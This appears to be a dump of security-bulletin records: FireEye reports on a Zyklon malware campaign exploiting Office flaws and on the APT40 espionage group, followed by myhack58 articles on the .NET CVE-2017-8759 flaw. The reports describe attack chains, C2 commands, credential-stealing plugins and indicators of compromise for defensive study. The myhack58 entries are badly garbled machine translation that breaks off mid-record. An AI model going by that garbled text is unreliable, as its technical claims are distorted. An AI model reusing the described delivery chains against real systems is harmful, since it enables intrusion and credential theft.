[discovered](<https://www.fireeye.com/blog/threat-research/2017/12/targeted-attack-in-middle-east-by-apt34.html>) vulnerability (CVE-2017-11882) in Microsoft Office. Upon opening the malicious DOC attachment, an additional download is triggered from a stored URL within an embedded OLE Object (seen in Figure 4).\n\n \nFigure 4: Embedded URL in OLE object\n\n \nFigure 5: HTTP GET request to download the next level payload\n\nThe downloaded file, _doc.doc,_ is XML-based and contains a PowerShell command (shown in Figure 6) that subsequently downloads the binary _Pause.ps1_.\n\n \nFigure 6: PowerShell command to download the Pause.ps1 payload\n\n##### Dynamic Data Exchange (DDE)\n\nDynamic Data Exchange (DDE) is the interprocess communication mechanism that is exploited to perform remote code execution. With the help of a PowerShell script (shown in Figure 7), the next payload (_Pause.ps1) _is downloaded.\n\n \nFigure 7: DDE technique used to download the Pause.ps1 payload\n\nOne of the unique approaches we have observed is the use of dot-less IP addresses (example: hxxp://258476380).\n\nFigure 8 shows the network communication of the _Pause.ps1_ download.\n\n \nFigure 8: Network communication to download the Pause.ps1 payload\n\n#### Zyklon Delivery\n\nIn all these techniques, the same domain is used to download the next level payload (_Pause.ps1_), which is another PowerShell script that is Base64 encoded (as seen in Figure 8).\n\nThe _Pause.ps1_ script is responsible for resolving the APIs required for code injection. It also contains the injectable shellcode. The APIs contain VirtualAlloc(), memset(), and CreateThread(). Figure 9 shows the decoded Base64 code.\n\n \nFigure 9: Base64 decoded Pause.ps1\n\nThe injected code is responsible for downloading the final payload from the server (see Figure 10). The final stage payload is a PE executable compiled with .Net framework.\n\n \nFigure 10: Network traffic to download final payload (words.exe)\n\nOnce executed, the file performs the following activities:\n\n 1. Drops a copy of itself in %AppData%\\svchost.exe\\svchost.exe and drops an XML file, which contains configuration information for Task Scheduler (as shown in Figure 11).\n 2. Unpacks the code in memory via process hollowing. The MSIL file contains the packed core payload in its .Net resource section.\n 3. The unpacked code is Zyklon.\n\n \nFigure 11: XML configuration file to schedule the task\n\nThe Zyklon malware first retrieves the external IP address of the infected machine using the following:\n\n * api.ipify[.]org\n * ip.anysrc[.]net\n * myexternalip[.]com\n * whatsmyip[.]com\n\nThe Zyklon executable contains another encrypted file in its .Net resource section named _tor_. This file is decrypted and injected into an instance of _InstallUtiil.exe_, and functions as a Tor anonymizer.\n\n#### Command & Control Communication\n\nThe C2 communication of Zyklon is proxied through the Tor network. The malware sends a POST request to the C2 server. The C2 server is appended by the gate.php, which is stored in file memory. The parameter passed to this request is getkey=y. In response to this request, the C2 server responds with a Base64-encoded RSA public key (seen in Figure 12).\n\n \nFigure 12: Zyklon public RSA key\n\nAfter the connection is established with the C2 server, the malware can communicate with its control server using the commands shown in Table 1.\n\nCommand\n\n| \n\nAction \n \n---|--- \n \nsign\n\n| \n\nRequests system information \n \nsettings\n\n| \n\nRequests settings from C2 server \n \nlogs\n\n| \n\nUploads harvested passwords \n \nwallet\n\n| \n\nUploads harvested cryptocurrency wallet data \n \nproxy\n\n| \n\nIndicates SOCKS proxy port opened \n \nminer\n\n| \n\nCryptocurrency miner commands \n \nerror\n\n| \n\nReports errors to C2 server \n \nddos\n\n| \n\nDDoS attack commands \n \nTable 1: Zyklon accepted commands\n\nThe following figures show the initial request and subsequent server response for the \u201csettings\u201d (Figure 13), \u201csign\u201d (Figure 14), and \u201cddos\u201d (Figure 15) commands.\n\n \nFigure 13: Zyklon issuing \u201csettings\u201d command and subsequent server response\n\n \nFigure 14: Zyklon issuing \u201csign\u201d command and subsequent server response\n\n \nFigure 15: Zyklon issuing \u201cddos\u201d command and subsequent server response\n\n#### Plugin Manager\n\nZyklon downloads number of plugins from its C2 server. The plugin URL is stored in file in following format:\n\n * /plugin/index.php?plugin=<_Plugin_Name_>\n\nThe following plugins are found in the memory of the Zyklon malware:\n\n * /plugin/index.php?plugin=cuda\n * /plugin/index.php?plugin=minerd\n * /plugin/index.php?plugin=sgminer\n * /plugin/index.php?plugin=socks\n * /plugin/index.php?plugin=tor\n * /plugin/index.php?plugin=games\n * /plugin/index.php?plugin=software\n * /plugin/index.php?plugin=ftp\n * /plugin/index.php?plugin=email\n * /plugin/index.php?plugin=browser\n\nThe downloaded plugins are injected into: Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe.\n\n#### Additional Features\n\nThe Zyklon malware offers the following additional capabilities (via plugins):\n\n##### Browser Password Recovery\n\nZyklon HTTP can recover passwords from popular web browsers, including:\n\n * Google Chrome\n * Mozilla Firefox\n * Internet Explorer\n * Opera Browser\n * Chrome Canary/SXS\n * CoolNovo Browser\n * Apple Safari\n * Flock Browser\n * SeaMonkey Browser\n * SRWare Iron Browser\n * Comodo Dragon Browser\n\n##### FTP Password Recovery\n\nZyklon currently supports FTP password recovery from the following FTP applications:\n\n * FileZilla\n * SmartFTP\n * FlashFXP\n * FTPCommander\n * Dreamweaver\n * WS_FTP\n\n##### Gaming Software Key Recovery\n\nZyklon can recover PC Gaming software keys from the following games:\n\n * Battlefield\n * Call of Duty\n * FIFA\n * NFS\n * Age of Empires\n * Quake\n * The Sims\n * Half-Life\n * IGI\n * Star Wars\n\n##### Email Password Recovery\n\nZyklon may also collect email passwords from following applications:\n\n * Microsoft Outlook Express\n * Microsoft Outlook 2002/XP/2003/2007/2010/2013\n * Mozilla Thunderbird\n * Windows Live Mail 2012\n * IncrediMail, Foxmail v6.x - v7.x\n * Windows Live Messenger\n * MSN Messenger\n * Google Talk\n * GMail Notifier\n * PaltalkScene IM\n * Pidgin (Formerly Gaim) Messenger\n * Miranda Messenger\n * Windows Credential Manager\n\n##### License Key Recovery\n\nThe malware automatically detects and decrypts the license/serial keys of more than 200 popular pieces of software, including Office, SQL Server, Adobe, and Nero.\n\n##### Socks5 Proxy\n\nZyklon features the ability to establish a reverse Socks5 proxy server on infected host machines.\n\n##### Hijack Clipboard Bitcoin Address\n\nZyklon has the ability to hijack the clipboard, and replaces the user\u2019s copied bitcoin address with an address served up by the actor\u2019s control server.\n\n#### Zyklon Pricing\n\nResearchers identified different versions of Zyklon HTTP being advertised in a popular underground marketplace for the following prices:\n\n * Normal build: $75 (USD)\n * Tor-enabled build: $125 (USD)\n * Rebuild/Updates: $15 (USD)\n * Payment Method: Bitcoin (BTC)\n\n#### Conclusion\n\nThreat actors incorporating recently discovered vulnerabilities in popular software \u2013 Microsoft Office, in this case \u2013 only increases the potential for successful infections. These types of threats show why it is very important to ensure that all software is fully updated. Additionally, all industries should be on alert, as it is highly likely that the threat actors will eventually move outside the scope of their current targeting.\n\nAt this time of writing, FireEye [Multi Vector Execution (MVX) engine](<https://www.fireeye.com/>) is able to recognize and block this threat. Table 2 lists the current detection and blocking capabilities by product.\n\nDetection Name\n\n| \n\nProduct\n\n| \n\nAction \n \n---|---|--- \n \nPOWERSHELL DOWNLOADER D (METHODOLOGY)\n\n| \n\nHX\n\n| \n\nDetect \n \nSUSPICIOUS POWERSHELL USAGE (METHODOLOGY)\n\n| \n\nHX\n\n| \n\nDetect \n \nPOWERSHELL DOWNLOADER (METHODOLOGY)\n\n| \n\nHX\n\n| \n\nDetect \n \nSUSPICIOUS EQNEDT USAGE (METHODOLOGY)\n\n| \n\nHX\n\n| \n\nDetect \n \nTOR (TUNNELER)\n\n| \n\nHX\n\n| \n\nDetect \n \nSUSPICIOUS SVCHOST.EXE (METHODOLOGY)\n\n| \n\nHX\n\n| \n\nDetect \n \nMalware.Binary.rtf\n\n| \n\nEX/ETP/NX\n\n| \n\nBlock \n \nMalware.Binary\n\n| \n\nEX/ETP/NX\n\n| \n\nBlock \n \nFE_Exploit_RTF_CVE_2017_8759\n\n| \n\nEX/ETP/NX\n\n| \n\nBlock \n \nFE_Exploit_RTF_CVE201711882_1\n\n| \n\nEX/ETP/NX\n\n| \n\nBlock \n \nTable 2: Current detection capabilities by FireEye products\n\n#### Indicators of Compromise\n\nThe contained analysis is based on the representative sample lures shown in Table 3.\n\nMD5\n\n| \n\nName \n \n---|--- \n \n76011037410d031aa41e5d381909f9ce\n\n| \n\naccounts.doc \n \n4bae7fb819761a7ac8326baf8d8eb6ab\n\n| \n\nCourrier.doc \n \neb5fa454ab42c8aec443ba8b8c97339b\n\n| \n\ndoc.doc \n \n886a4da306e019aa0ad3a03524b02a1c\n\n| \n\nPause.ps1 \n \n04077ecbdc412d6d87fc21e4b3a4d088\n\n| \n\nwords.exe \n \nTable 3: Sample Zyklon lures\n\n##### Network Indicators\n\n * 154.16.93.182\n * 85.214.136.179\n * 178.254.21.218\n * 159.203.42.107\n * 217.12.223.216\n * 138.201.143.186\n * 216.244.85.211\n * 51.15.78.0\n * 213.251.226.175\n * 93.95.100.202\n * warnono.punkdns.top\n", "modified": "2018-01-17T12:00:00", "published": "2018-01-17T12:00:00", "id": "FIREEYE:327A8F88F73C7D036A5D128A75C86E11", "href": "https://www.fireeye.com/blog/threat-research/2018/01/microsoft-office-vulnerabilities-used-to-distribute-zyklon-malware.html", "type": "fireeye", "title": "Microsoft Office Vulnerabilities Used to Distribute Zyklon Malware in Recent Campaign", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2020-10-02T10:01:23", "bulletinFamily": "info", "cvelist": ["CVE-2012-0158", "CVE-2017-0199", "CVE-2017-11882", "CVE-2017-8759"], "description": "FireEye is highlighting a cyber espionage operation targeting crucial technologies and traditional intelligence targets from a China-nexus state sponsored actor we call APT40. The actor has conducted operations since at least 2013 in support of China\u2019s naval modernization effort. The group has specifically targeted engineering, transportation, and the defense industry, especially where these sectors overlap with maritime technologies. More recently, we have also observed specific targeting of countries strategically important to the Belt and Road Initiative including Cambodia, Belgium, Germany, Hong Kong, Philippines, Malaysia, Norway, Saudi Arabia, Switzerland, the United States, and the United Kingdom. This China-nexus cyber espionage group was previously reported as TEMP.Periscope and TEMP.Jumper.\n\n#### Mission\n\nIn December 2016, China\u2019s People Liberation Army Navy (PLAN) seized a U.S. Navy unmanned underwater vehicle (UUV) operating in the South China Sea. The incident paralleled China\u2019s actions in cyberspace; within a year APT40 was observed masquerading as a UUV manufacturer, and targeting universities engaged in naval research. That incident was one of many carried out to acquire advanced technology to support the development of Chinese naval capabilities. We believe APT40\u2019s emphasis on maritime issues and naval technology ultimately support China\u2019s ambition to establish a blue-water navy.\n\nIn addition to its maritime focus, APT40 engages in broader regional targeting against traditional intelligence targets, especially organizations with operations in Southeast Asia or involved in South China Sea disputes. Most recently, this has included [victims with connections to elections](<https://www.fireeye.com/blog/threat-research/2018/07/chinese-espionage-group-targets-cambodia-ahead-of-elections.html>) in Southeast Asia, which is likely driven by events affecting China\u2019s Belt and Road Initiative. China\u2019s \u201cOne Belt, One Road\u201d (\u4e00\u5e26\u4e00\u8def) or \u201cBelt and Road Initiative\u201d (BRI) is a $1 trillion USD endeavor to build land and maritime trade routes across Asia, Europe, the Middle East, and Africa to develop a trade network that will project China\u2019s influence across the greater region.\n\n \nFigure 1: Countries and industries targeted. Countries include the United States, United Kingdom, Norway, Germany, Saudi Arabia, Cambodia and Indonesia\n\n#### Attribution\n\nWe assess with moderate confidence that APT40 is a state-sponsored Chinese cyber espionage operation. The actor\u2019s targeting is consistent with Chinese state interests and there are multiple technical artifacts indicating the actor is based in China. Analysis of the operational times of the group\u2019s activities indicates that it is probably centered around China Standard Time (UTC +8). In addition, multiple APT40 command and control (C2) domains were initially registered by China based domain resellers and had Whois records with Chinese location information, suggesting a China based infrastructure procurement process.\n\nAPT40 has also used multiple Internet Protocol (IP) addresses located in China to conduct its operations. In one instance, a log file recovered from an [open indexed server](<https://www.fireeye.com/blog/threat-research/2018/07/chinese-espionage-group-targets-cambodia-ahead-of-elections.html>) revealed that an IP address (112.66.188.28) located in Hainan, China had been used to administer the command and control node that was communicating with malware on victim machines. All of the logins to this C2 were from computers configured with Chinese language settings.\n\n#### Attack Lifecycle\n\n_Initial Compromise_\n\nAPT40 has been observed leveraging a variety of techniques for initial compromise, including web server exploitation, phishing campaigns delivering publicly available and custom backdoors, and strategic web compromises.\n\n * APT40 relies heavily on web shells for an initial foothold into an organization. Depending on placement, a web shell can provide continued access to victims' environments, re-infect victim systems, and facilitate lateral movement.\n * The operation\u2019s spear-phishing emails typically leverage malicious attachments, although Google Drive links have also been observed.\n * APT40 leverages exploits in their phishing operations, often weaponizing vulnerabilities within days of their disclosure. Observed vulnerabilities include:\n * [CVE-2012-0158](<https://intelligence.fireeye.com/reports/12-19517>)\n * [CVE-2017-0199](<https://intelligence.fireeye.com/reports/17-00003493>)\n * [CVE-2017-8759](<https://intelligence.fireeye.com/reports/17-00010114>)\n * [CVE-2017-11882](<https://intelligence.fireeye.com/reports/17-00012724>)\n\n \nFigure 2: APT40 attack lifecycle\n\n_Establish Foothold_\n\nAPT40 uses a variety of malware and tools to establish a foothold, many of which are either publicly available or used by other threat groups. In some cases, the group has used executables with code signing certificates to avoid detection.\n\n * First-stage backdoors such as AIRBREAK, FRESHAIR, and BEACON are used before downloading other payloads.\n * PHOTO, BADFLICK, and CHINA CHOPPER are among the most frequently observed backdoors used by APT40.\n * APT40 will often target VPN and remote desktop credentials to establish a foothold in a targeted environment. This methodology proves to be ideal as once these credentials are obtained, they may not need to rely as heavily on malware to continue the mission.\n\n_Escalate Privileges_\n\nAPT40 uses a mix of custom and publicly available credential harvesting tools to escalate privileges and dump password hashes.\n\n * APT40 leverages custom credential theft utilities such as HOMEFRY, a password dumper/cracker used alongside the AIRBREAK and BADFLICK backdoors.\n * Additionally, the Windows Sysinternals ProcDump utility and Windows Credential Editor (WCE) are believed to be used during intrusions as well.\n\n_Internal Reconnaissance_\n\nAPT40 uses compromised credentials to log on to other connected systems and conduct reconnaissance. The group also leverages RDP, SSH, legitimate software within the victim environment, an array of native Windows capabilities, publicly available tools, as well as custom scripts to facilitate internal reconnaissance.\n\n * APT40 used MURKYSHELL at a compromised victim organization to port scan IP addresses and conduct network enumeration.\n * APT40 frequently uses native Windows commands, such as net.exe, to conduct internal reconnaissance of a victim\u2019s environment.\n * Web shells are heavily relied on for nearly all stages of the attack lifecycle. Internal web servers are often not configured with the same security controls as public-facing counterparts, making them more vulnerable to exploitation by APT40 and similarly sophisticated groups.\n\n_Lateral Movement_\n\nAPT40 uses many methods for lateral movement throughout an environment, including custom scripts, web shells, a variety of tunnelers, as well as Remote Desktop Protocol (RDP). For each new system compromised, the group usually executes malware, performs additional reconnaissance, and steals data.\n\n * APT40 also uses native Windows utilities such as at.exe (a task scheduler) and net.exe (a network resources management tool) for lateral movement.\n * Publicly available tunneling tools are leveraged alongside distinct malware unique to the operation.\n * Although MURKYTOP is primarily a command-line reconnaissance tool, it can also be used for lateral movement.\n * APT40 also uses publicly available brute-forcing tools and a custom utility called DISHCLOTH to attack different protocols and services.\n\n_Maintain Presence_\n\nAPT40 primarily uses backdoors, including web shells, to maintain presence within a victim environment. These tools enable continued control of key systems in the targeted network.\n\n * APT40 strongly favors web shells for maintaining presence, especially publicly available tools.\n * Tools used during the Establish Foothold phase also continue to be used in the Maintain Presence phase; this includes AIRBREAK and PHOTO.\n * Some APT40 malware tools can evade typical network detectiona by leveraging legitimate websites, such as GitHub, Google, and Pastebin for initial C2 communications.\n * Common TCP ports 80 and 443 are used to blend in with routine network traffic.\n\n_Complete Mission_\n\nCompleting missions typically involves gathering and transferring information out of the target network, which may involve moving files through multiple systems before reaching the destination. APT40 has been observed consolidating files acquired from victim networks and using the archival tool rar.exe to compress and encrypt the data before exfiltration. We have also observed APT40 develop tools such as PAPERPUSH to aid in the effectiveness of their data targeting and theft.\n\n#### Outlook and Implications\n\nDespite increased public attention, APT40 continues to conduct cyber espionage operations following a regular tempo, and we anticipate their operations will continue through at least the near and medium term. Based on APT40\u2019s broadening into election-related targets in 2017, we assess with moderate confidence that the group\u2019s future targeting will affect additional sectors beyond maritime, driven by events such as China\u2019s Belt and Road Initiative. In particular, as individual Belt and Road projects unfold, we are likely to see continued activity by APT40 which extends against the project\u2019s regional opponents.\n", "modified": "2019-03-04T13:00:00", "published": "2019-03-04T13:00:00", "id": "FIREEYE:8DF2C812CF325AAB2F348273A03789F5", "href": "https://www.fireeye.com/blog/threat-research/2019/03/apt40-examining-a-china-nexus-espionage-actor.html", "type": "fireeye", "title": "APT40: Examining a China-Nexus Espionage Actor", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "myhack58": [{"lastseen": "2017-09-15T19:42:23", "bulletinFamily": "info", "cvelist": ["CVE-2017-8759"], "edition": 1, "description": "Accident with a view \n8 on 24 May, the 360 focus of the Network Security Business Unit capture to a new office high-end intimidating intrusion attacks. 12, Microsoft stopped large-scale network security updates including CVE-2017-8759 of. The same time, FireEye also promulgated the invention of the CVE-2017-8759 fields of application. Due to the vulnerability flaws of the bug affecting the scale of the wide application of low difficulty, 360CERT pressing on their follow-up elucidating it. Recover the warning passed. \nRisk grade \n[+]Major \nScale of impact \nMicrosoft . NET Framework 4.7 \nMicrosoft . NET Framework 4.6.2 \nMicrosoft . NET Framework 4.6.1 \nMicrosoft . NET Framework 4.6 \nMicrosoft . NET Framework 4.5.2 \nMicrosoft . NET Framework 3.5.1 \nMicrosoft . NET Framework 3.5 \nMicrosoft . NET Framework 2.0 SP2 \nVulnerability flaws bug positioning \nCVE-2017-8759 vulnerability flaws bug originally in the wsdl xml the disposal of defective, if the supply includes a CRLF sequence data, then IsValidUrl does not perform accurate authentication. Now. NET source code, positioned to the accomplishments of the disposal interface: \n! [](/Article/UploadPic/2017-9/2017915235959840. png? www. myhack58. com) \nAnd exploit the flaws bug the trigger point: \n! [](/Article/UploadPic/2017-9/2017916000346. png? www. myhack58. com) \nFunction here born logo. cs and misappropriation of csc. exe to stop the compile as a dll, the capture to the cs source files and born of the dll. \n! [](/Article/UploadPic/2017-9/2017916000274. png? www. myhack58. com) \nThe entire process is: \n1\\. Pleadingly vicious thoughts SOAP WSDL \n2\\. . NET Framework System. Runtime. Remoting. ni. dll in the IsValidUrl verify the defect \n3\\. \u6b79\u610f\u4ee3\u7801\u7ecf\u7531\u8fdb\u7a0b.NET Framework of the System. Runtime. Remoting. ni. dll PrintClientProxy written in the cs file. \n4\\. csc. exe for cs files compiled into a dll \n5\\. Office add-in dll \n6\\. Fulfilling vicious thoughts code \nVulnerability flaws bug verification \n! [](/Article/UploadPic/2017-9/2017916000520.jpg) \nRepair plan \nFor the vulnerability flaws of the bug invasion attack samples, 360 network security guards have been in the first follow-up killing, please large recent user don't close the unsolicited office documents, while the coherent unit is also necessary warnings such 0day vulnerabilities flaws bug the orientation of the intrusion, and the application 360 Internet Security Guard means vulnerability flaws bug patch and attack to the vulnerability flaws of the bug invasion attack. \nNetwork security notification Bulletin: https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2017-8759\n", "modified": "2017-09-15T00:00:00", "published": "2017-09-15T00:00:00", "href": "http://www.myhack58.com/Article/html/3/62/2017/89305.htm", "id": "MYHACK58:62201789305", "title": "Microsoft the Microsoft . NET Framework flaws vulnerability bug\uff08CVE\u20132017\u20138759\uff09alerts-a vulnerability alert-the black bar safety net", "type": "myhack58", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2017-09-21T19:40:26", "bulletinFamily": "info", "cvelist": ["CVE-2017-0199", "CVE-2017-8759"], "edition": 1, "description": "0\u00d71 details \nIn recent days, Tencent computer housekeeper to capture a new office document virus samples, \u7ecf\u9610\u53d1\u4e3a9\u670812\u53f7\u521a\u88ab\u5fae\u8f6f\u4fee\u590d\u7684.NET Framework vulnerability flaws bug\uff08CVE-2017-8759 the fields of intrusion samples. The vulnerability flaws of the bug with the previous rtf vulnerabilities flaws bug\uff08CVE-2017-0199 the same, just the user closes a malicious Trojan virus Office documents will be caught. \n0\u00d72 CVE-2017-8759 vulnerability flaws bug the fulfilment elucidating \nCVE-2017-8759\u672c\u8d28\u4e0a\u662f\u4e00\u4e2a.net framework vulnerability flaws bug, \u5f71\u54cd\u6240\u6709\u4e3b\u6d41\u7684.NET Framework version: \nMicrosoft . NET Framework 4.6.2 \nMicrosoft . NET Framework 4.6.1 \nMicrosoft . NET Framework 3.5.1 \nMicrosoft . NET Framework 4.7 \nMicrosoft . NET Framework 4.6 \nMicrosoft . NET Framework 4.5.2 \nMicrosoft . NET Framework 3.5 \nMicrosoft . NET Framework 2.0 SP2 \n...... \nAfter the mainstream windows 7, windows 10\u7b49\u64cd\u7eb5\u7cfb\u7edf\u5e73\u53f0\u4e2d\u90fd\u9ed8\u8bb8\u5b89\u88c5\u4e86.NET Framework, \u4efb\u4f55\u5e94\u7528SOAP\u529e\u4e8b\u7684\u8f6f\u4ef6\u90fd\u80fd\u7ecf\u7531\u8fc7\u7a0b.NET Framework is triggered. While it can be integrated into an office document, the user simply double-click the close an office document, without the rest of the manipulation, you can trigger the vulnerability flaws bugs, the complete feel free to rate code implementation. Vulnerability flaws bug at http://referencesource. microsoft. com/#System. Runtime. Remoting/metadata/wsdl PrintClientProxy function, the function used to parse the wsdl file and the information obtained after pattern formation. cs code parser. cs: \n! [](/Article/UploadPic/2017-9/201792123156489. png? www. myhack58. com) \nFigure 1: parser. cs sector code \nsoap:address location specifies the SOAP URL of the location at 6142 row, 6149 row, call the WsdlParser. IsValidUrl()function to the pattern of the location specifies the URL location: \n! [](/Article/UploadPic/2017-9/201792123156471. png? www. myhack58. com) \nFigure 2: IsValidUrl function code snippet \nThis function of the efficacy of a brief, the analysis to obtain the URL location of the back combined with@\u201dand end coupled with the\u201d, To, for example: \nstring value output to the URL location is http://guanjia. qq. com, will be the pattern to@\u201dhttp://guanjia.qq.com\u201dto to the caller. 6148 row, 6149 lines, 6150 line three-line code pattern into the following code: \n// the base. ConfigureProxy(this. GetType(), @\u201d\u201dhttp://guanjia.qq.com\u201d \nA wsdl file can specify multiple location, from the above code can be seen, as long as the first location is useful, from the second start will be coupled with the body identifier of the//, the full URL of the location will be seen as the text content is output to. cs code, then will the creation of the csc. exe process, which compiled born with a name similar to http*****. dll, this DLL will be loaded into the office process, because the ultimate compilation born. dll outside does not contain the text of the URL locations, in normal circumstances, here does not have any achievements. \nWhat, then WsdlParser. IsValidUrl()function is not to weigh the output of the string value will contain a newline character to the environment, for example, we captured a sample, specify the following shown in one location: \n! [](/Article/UploadPic/2017-9/201792123156751. png? www. myhack58. com) \nFigure 3: snap to the sample location code \nWsdlParser. IsValidUrl()function pattern, will be born the following code: \n! [](/Article/UploadPic/2017-9/201792123156206. png? www. myhack58. com) \nFigure 4: Britain at the end IsValidUrl pattern of future generations of code \nWe can see the body of the identifier//only the body of the base. ConfigureProxy(this. GetType (),@\u201d;, because the newline is there, it is not the body off the next 4 lines of code, The code will be compiled to the end of the age born of http*****. dll is an office procedure after the load to fulfill. \nIs malicious Trojan virus sample simply particular structure of the soap xml, as \n! [](/Article/UploadPic/2017-9/201792123156630. png? www. myhack58. com) \nFigure 5: a malicious Trojan virus the structure of the soap xml code \nThen via a process System. Diagnostics. Process. Start(_url. Split(\u2018?\u2019) [1], _url. Split(\u2018?\u2019) [2]);this line of code will be able to the creation of the Rwanda. exe process, and then pull the corresponding script perform malicious Trojan virus code. \n0\u00d73 sample elucidating \nCapture to the fields of application of the sample via a process mailbox stop the spread, the main invasion attack tools include foreign trade things practitioners. Invasion attacker to intrusion attacks aimed at transmitting vertical nylon message, and then included with the application vulnerability flaws bug the structure of the order. doc the document, the lure is the invasion of the attack of the user shut. And once accidentally closed the document, it will trigger the vulnerability flaws bugs is dill plant on the remote control Trojan, incur \u9690\u8877 information revealed. \nSample procedure to start the enterprise the following: \n! [](/Article/UploadPic/2017-9/201792123156892. png? www. myhack58. com) \nFigure 6: sample start the stakeholder chain \n1, document fulfillment elucidating: the \nThe document closed, will be from the Do Controller http://endlesspaws[.] com/plas/word[.] db, pull db file, and that file embedded in a VBScript script, by Rwanda. exe analysis performance: \n! [](/Article/UploadPic/2017-9/201792123156288. png? www. myhack58. com) \nFigure 7: embedding the VBScript script code \nIt plays the first will be clearing out now profile born. cs code file, a compiled born. pdb, the. dll file, which will be further from the invasion of the attacker moderation for the long haul-do Controller the relay socket to download the Trojan file to a: \nhttp://endlesspaws[.] com/plas/under[.] php? hhh=5 in. \n2, virus a elucidating: the \nThe sample is a downloader, it will inherit from the virus-do download virus file b: \nhttp://endlesspaws[.] com/plas/under[.] php? hhh=2 \n\n\n**[1] [[2]](<89425_2.htm>) [next](<89425_2.htm>)**\n", "modified": "2017-09-21T00:00:00", "published": "2017-09-21T00:00:00", "id": "MYHACK58:62201789425", "href": "http://www.myhack58.com/Article/html/3/62/2017/89425.htm", "title": "The latest exposure of the RTF vulnerability beside the use of research to explore the topic guide-vulnerability warning-the black bar safety net", "type": "myhack58", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-09-13T19:14:34", "bulletinFamily": "info", "cvelist": ["CVE-2017-0199"], "edition": 1, "description": "Krzysztof, the 360 group focus of the Security Business Unit elucidating the team invented a new type of Office document high-end intimidating onslaught, the \u8fdb\u51fb\u5e94\u7528\u4e869\u670812\u65e5\u8865\u9489\u521a\u4fee\u590d\u7684.NET Framework flaws vulnerability bug, the flaw exploits a bug in the field is applied for 0day condition, the user closed the vicious thoughts of the Office document will be caught. The flaws exploit the bug of the tips make sense and the year of the hack\u201cOscar\u201dof Pwnie Awards on the best client flaws vulnerability bug\uff08CVE-2017-0199\uff09the same, the differences is that the hackers in the Offcie of the document embedded in the new Moniker of the tool, the application is. net Library flaws exploits a bug in an Office document is loaded perform a long of vicious thoughts. NET code, \u800c\u5168\u90e8\u7834\u7efd\u6f0f\u6d1ebug\u7684\u7f6a\u9b41\u7978\u9996\u7ade\u662f.NET Framework, a newline, and the disposal of the mistakes. \nOnslaught impact of elucidating \nVia the process of a series of fields of application of the samples the the server file time to stop tracking elucidating, we have reason to trust the flaws vulnerability bug field application time the presentation time for the 2017 year 8 on 16, or even earlier, the flaws vulnerability bug toward the application of 0day flaws vulnerability bug situation, today Microsoft had an urgent announcement. net Framework patch to repair the flaws vulnerability bug. \n! [](/Article/UploadPic/2017-9/2017913201828446. png? www. myhack58. com) \n\u8be5\u7834\u7efd\u6f0f\u6d1ebug\u5f71\u54cd\u6240\u6709\u4e3b\u6d41\u7684.NET Framework version. Because mainstream windows operating systems are tacitly built in. net Framework hack via process office documents embedded in the long-haul of vicious thoughts. net code to stop the onslaught, all of the windows System and the installation of the office software users YAP affected. Now the flaws vulnerability bug details once in the foreign small-scale enactment, a onslaught to May was numerous trend. \nMicrosoft . NET Framework 4.6.2 \nMicrosoft . NET Framework 4.6.1 \nMicrosoft . NET Framework 3.5.1 \nMicrosoft . NET Framework 4.7 \nMicrosoft . NET Framework 4.6 \nMicrosoft . NET Framework 4.5.2 \nMicrosoft . NET Framework 3.5 \nMicrosoft . NET Framework 2.0 SP2 \n0day flaws vulnerability bug problem details elucidating \nIn the. net Library in the SOAP WSDL profiling module IsValidUrl function without the right disposal including carriage return newline in the environment, lead to the misappropriation of those functions PrintClientProxy the presence of code injection to fulfil flaws vulnerability bug. \n! [](/Article/UploadPic/2017-9/2017913201828596. png? www. myhack58. com) \nDiversion's function screenshot below \n\n! [](/Article/UploadPic/2017-9/2017913201828256. png? www. myhack58. com) \nDisorders environment currently on file including a plurality of soap:address location when PrintClientProxy function of the innate code as long as the first row is useful, other actions of the body. \nBut the Department code is not at the discretion of the soap:address location content can be perhaps the presence of a newline character, leading to the body of the command\u201c//\u201donly the first line of the failure, else the code is as useful code disorders to fulfill. \nVicious thoughts sample will structure the following figure the output the soap xml data \n! [](/Article/UploadPic/2017-9/2017913201828977. png? www. myhack58. com) \nBecause of the presence of flaws vulnerability bug profiling Library for soap xml data in the newline disposal blunders, csc. the exe will compile its injected. net code running \n! [](/Article/UploadPic/2017-9/2017913201828949. png? www. myhack58. com) \nSample flaws vulnerability bug onslaught process of elucidating \nAbove we picked the flaw exploits a bug of a field application of the sample to stop elucidating the flaws vulnerability bug really document the pattern of rtf, the sample application cve-2017-0199 same objupdate tool update mechanism, the application of the SOAP Moniker from the long-distance server to pull a SOAP XML file, specify the . net Library SOAP WSDL module analysis. \n\n! [](/Article/UploadPic/2017-9/2017913201828677. png? www. myhack58. com) \n! [](/Article/UploadPic/2017-9/2017913201829309. png? www. myhack58. com) \nFlaws vulnerability bug the complete fulfillment flow the following: \n! [](/Article/UploadPic/2017-9/2017913201829375. png? www. myhack58. com) \nSample onslaught script loads elucidating \nVicious thoughts of a soap xml file to be pulled to the local, SOAP WSDL library to dissect the flaws vulnerability the bug is triggered, csc. exe will take the initiative to compile the fulfilment of which the. net code. \n! [](/Article/UploadPic/2017-9/2017913201829780. png? www. myhack58. com) \nThe Code of the Application System. Diagnostics. Process. Start interface misappropriation of Rwanda. exe loaded long-haul hta script to fulfil. \n! [](/Article/UploadPic/2017-9/2017913201829266. png? www. myhack58. com) \nVicious thoughts hta script embedded in a db suffix of the binary stream file in, played a certain promiscuous pretend to reform it. \n! [](/Article/UploadPic/2017-9/2017913201829692. png? www. myhack58. com) \nUltimate, the sample will be applied powershell download operation pretending to offcie patch file name of the PE load. \n! [](/Article/UploadPic/2017-9/2017913201829765. png? www. myhack58. com) \n\nSample PE load briefly elucidating \nVia the process of the PE load of elucidating, in our invention the sample is the sample application of the severe confounding of the code and the fictional machine tips specifically blocking the researchers elucidating the fictional machine encryption framework is relatively complicated, probably flow less. \n\n\n**[1] [[2]](<89251_2.htm>) [next](<89251_2.htm>)**\n", "modified": "2017-09-13T00:00:00", "published": "2017-09-13T00:00:00", "id": "MYHACK58:62201789251", "href": 